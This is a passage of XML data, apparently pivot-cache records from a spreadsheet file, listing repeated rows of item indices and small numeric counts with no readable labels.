    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1227"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="69"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="69"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="69"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1228"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="4"/>
    <x v="1230"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="124"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="40"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1193"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1174"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="15"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="86"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="210"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1231"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="48"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1232"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1233"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1234"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="8"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="19"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1235"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1236"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1237"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1238"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1239"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="36"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="36"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="36"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="36"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="36"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="36"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1240"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1241"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1242"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="585"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="585"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="100"/>
    <x v="585"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="585"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1203"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="17"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1243"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="9"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="26"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="14"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="26"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="14"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1244"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1229"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1245"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1246"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
